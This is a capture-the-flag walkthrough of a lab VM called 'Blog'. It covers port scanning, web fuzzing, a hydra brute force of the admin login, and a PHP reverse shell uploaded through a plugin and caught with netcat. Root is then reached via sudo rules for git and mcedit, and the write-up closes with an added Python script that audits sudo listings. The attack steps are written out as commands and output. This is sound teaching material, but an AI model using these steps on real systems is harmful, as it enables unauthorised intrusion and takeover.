This machine was created by d4t4s3c

Port scanning with nmap, or you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon blog.hmvm

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-19 19:24 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Initiating ARP Ping Scan at 19:24
Scanning blog.hmvm (10.0.2.22) [1 port]
Completed ARP Ping Scan at 19:24, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:24
Scanning blog.hmvm (10.0.2.22) [65535 ports]
Discovered open port 22/tcp on 10.0.2.22
Discovered open port 80/tcp on 10.0.2.22
Completed SYN Stealth Scan at 19:24, 1.49s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.22.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Nmap scan report for blog.hmvm (10.0.2.22)
Host is up (0.000058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:B4:A6:4E (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 19:24
Completed NSE at 19:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.74 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)


[i] [Server info]
http://blog.hmvm:80 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[10.0.2.22]

[+] [fuzzin server]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Sep 19 19:24:57 2022
URL_BASE: http://blog.hmvm:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://blog.hmvm:80/ ----
+ http://blog.hmvm:80/index.php (CODE:200|SIZE:271)
+ http://blog.hmvm:80/server-status (CODE:403|SIZE:274)

-----------------
END_TIME: Mon Sep 19 19:24:59 2022
DOWNLOADED: 4612 - FOUND: 2

recon reports two open ports and some additional information

┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hc=404 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://blog.hmvm/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://blog.hmvm/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000003:   200        6 L      37 W       271 Ch      "# Copyright 2007 James Fisher"                                                                                                    
000000001:   200        6 L      37 W       271 Ch      "# directory-list-2.3-medium.txt"                                                                                                  
000000007:   200        6 L      37 W       271 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                                                  
000000014:   200        6 L      37 W       271 Ch      "http://blog.hmvm/"                                                                                                                
000000011:   200        6 L      37 W       271 Ch      "# Priority ordered case sensative list, where entries were found"                                                                 
000000006:   200        6 L      37 W       271 Ch      "# Attribution-Share Alike 3.0 License. To view a copy of this"                                                                    
000000008:   200        6 L      37 W       271 Ch      "# or send a letter to Creative Commons, 171 Second Street,"                                                                       
000000005:   200        6 L      37 W       271 Ch      "# This work is licensed under the Creative Commons"                                                                               
000000002:   200        6 L      37 W       271 Ch      "#"                                                                                                                                
000000010:   200        6 L      37 W       271 Ch      "#"                                                                                                                                
000000013:   200        6 L      37 W       271 Ch      "#"                                                                                                                                
000000009:   200        6 L      37 W       271 Ch      "# Suite 300, San Francisco, California, 94105, USA."                                                                              
000000012:   200        6 L      37 W       271 Ch      "# on atleast 2 different hosts"                                                                                                   
000000004:   200        6 L      37 W       271 Ch      "#"                                                                                                                                
000007428:   301        9 L      28 W       310 Ch      "my_weblog"                                                                                                                        
000045240:   200        6 L      37 W       271 Ch      "http://blog.hmvm/"
000095524:   403        9 L      28 W       274 Ch      "server-status"

Total time: 0
Processed Requests: 220560
Filtered Requests: 220543
Requests/sec.: 0

An interesting directory, my_weblog, so more fuzzing

┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hc=404 -w /usr/share/wfuzz/wordlist/general/big.txt http://blog.hmvm/my_weblog/FUZZ.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://blog.hmvm/my_weblog/FUZZ.php
Total requests: 3024

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000119:   200        26 L     96 W       1395 Ch     "admin"                                                                                                                            
000001350:   200        64 L     201 W      4297 Ch     "index"                                                                                                                            

Total time: 0
Processed Requests: 3024
Filtered Requests: 3022
Requests/sec.: 0

At this point there seems to be only one way forward: brute-forcing the login

┌──(root@ghost)-[/home/ghost]
└─# hydra -t 50 -l admin -P rockyou.txt blog.hmvm http-post-form '/my_weblog/admin.php:username=admin&password=^PASS^:Incorrect'
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-19 20:02:14
[DATA] max 50 tasks per 1 server, overall 50 tasks, 14344399 login tries (l:1/p:14344399), ~286888 tries per task
[DATA] attacking http-post-form://blog.hmvm:80/my_weblog/admin.php:username=admin&password=^PASS^:Incorrect
[STATUS] 137.00 tries/min, 137 tries in 00:01h, 14344262 to do in 1745:03h, 50 active
[80][http-post-form] host: blog.hmvm   login: admin   password: kisses
[STATUS] 4781466.33 tries/min, 14344399 tries in 00:03h, 1 to do in 00:01h, 3 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-19 20:05:37

We have admin credentials, so it is time to log in. Searching for a place to upload a file, we find it under Plugins, Manage plugins, My image; click on Configure. Create a shell and upload it

┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.0.2.15 1337 > rev.php

Time to start a netcat listener and execute the shell by visiting http://blog.hmvm/my_weblog/content/private/plugins/my_image/image.php

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.15] from blog.hmvm [10.0.2.22] 52274
Linux blog 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
 02:15:54 up 56 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@blog:/$ sudo -l

Matching Defaults entries for www-data on blog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on blog:
    (admin) NOPASSWD: /usr/bin/git

www-data@blog:/$ sudo -u admin git help config

admin@blog:~$ cat /home/admin/user.txt
a8nuLuByPMCpuf4k3f146j9NtOsmi2dKZGN3m

Here is the user flag; time to get root

admin@blog:~$ sudo -l

Matching Defaults entries for admin on blog:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User admin may run the following commands on blog:
    (root) NOPASSWD: /usr/bin/mcedit

This part is a little bit tricky

admin@blog:~$ sudo -u root /usr/bin/mcedit

Once it is open, press F9 and Enter, go to User Menu and select s (invoke shell)

# cat /root/r0000000000000000000000000t.txt
fO6QQxO1oenROPf4k3f146vweJRVgbtPQ3RQ4
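
Both privilege steps above come from sudo rules that grant a program able to start a shell from inside itself (git, then mcedit), with NOPASSWD and no argument restriction. The following is an added example, not part of the original write-up, that audits `sudo -l` output for such rules; apart from git and mcedit the program list is an assumed, short illustration list, and the `backup` listing is constructed for contrast.

```python
import re

# Programs that can start a shell or run other commands from inside themselves.
# git and mcedit are the two from this page; the other names are an assumed,
# deliberately short illustration list, not a complete inventory.
SHELL_CAPABLE = {"git", "mcedit", "vi", "vim", "less", "more", "man", "find", "awk"}

# One rule line of `sudo -l` output: "(runas) TAG: TAG: cmd, cmd".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")

def audit_sudo_listing(text):
    """Return (runas, command, reasons) for each rule that hands out a shell."""
    findings = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines, headers, blanks
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        for cmd in m["cmds"].split(","):
            parts = cmd.split()
            if not parts:
                continue
            name = parts[0].rsplit("/", 1)[-1]
            if name != "ALL" and name not in SHELL_CAPABLE:
                continue
            reasons = ["all commands" if name == "ALL" else "shell-capable program"]
            if "NOPASSWD" in tags:
                reasons.append("NOPASSWD")
            if len(parts) == 1 and name != "ALL":
                reasons.append("arguments unrestricted")
            findings.append((m["runas"].strip(), parts[0], reasons))
    return findings

# The two listings shown on this page, trimmed to the rule lines.
WWW_DATA_LISTING = """User www-data may run the following commands on blog:
    (admin) NOPASSWD: /usr/bin/git
"""
ADMIN_LISTING = """User admin may run the following commands on blog:
    (root) NOPASSWD: /usr/bin/mcedit
"""
# Constructed contrast: a fixed command line for a hypothetical user.
SAFE_LISTING = """User backup may run the following commands on blog:
    (root) /usr/sbin/service apache2 reload
"""

if __name__ == "__main__":
    for listing in (WWW_DATA_LISTING, ADMIN_LISTING, SAFE_LISTING):
        print(audit_sudo_listing(listing))
```

Rules flagged this way are better replaced by a fixed command line or a small wrapper script that performs only the one task the account needs.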